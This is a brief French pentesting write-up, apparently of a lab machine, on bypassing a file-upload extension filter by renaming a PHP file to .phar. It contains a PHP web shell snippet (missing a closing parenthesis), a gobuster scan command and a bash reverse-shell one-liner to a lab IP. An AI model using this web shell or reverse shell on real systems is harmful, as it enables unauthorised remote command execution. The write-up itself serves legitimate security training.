File Upload (.phar extension) - Pentesting Web

Tentative d'exploiter une vulnérabilité de téléchargement de fichiers en insérant un fichier PHP malveillant

<?php
system($_GET['cmd'];
?>

Le serveur refuse automatiquement les requêtes d'upload de fichiers possédant certaines extensions.

Interception avec BurpSuite:

Utilisation de BurpSuite pour intercepter et analyser le trafic afin de comprendre les erreurs d'exploitation

Modifier l'extension du fichier de .php à .phar dans la variable filename, et vous assurer que l'emplacement est accepté avec succès

Enumeration de Répertoires:

Utilisation de Gobuster pour identifier les répertoires sur un serveur web et localiser le stockage des images médicales uploadées.

gobuster dir -u http://10.10.11.241:8080/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20

Le contenu d'un fichier .phar n'est pas interprété.

Utilisation d'Outil GitHub pour Créer une Shell:

Utilisation d'un outil provenant d'un projet GitHub pour contourner les restrictions de téléchargement de fichiers PHP et obtenir un accès shell

Lancement d'une Reverse Shell:

/usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.18/444 0>&1'

Exécution d'une reverse shell pour établir un accès interactif à la machine cible et obtenir un contrôle total.

Mis à jour il y a 1 an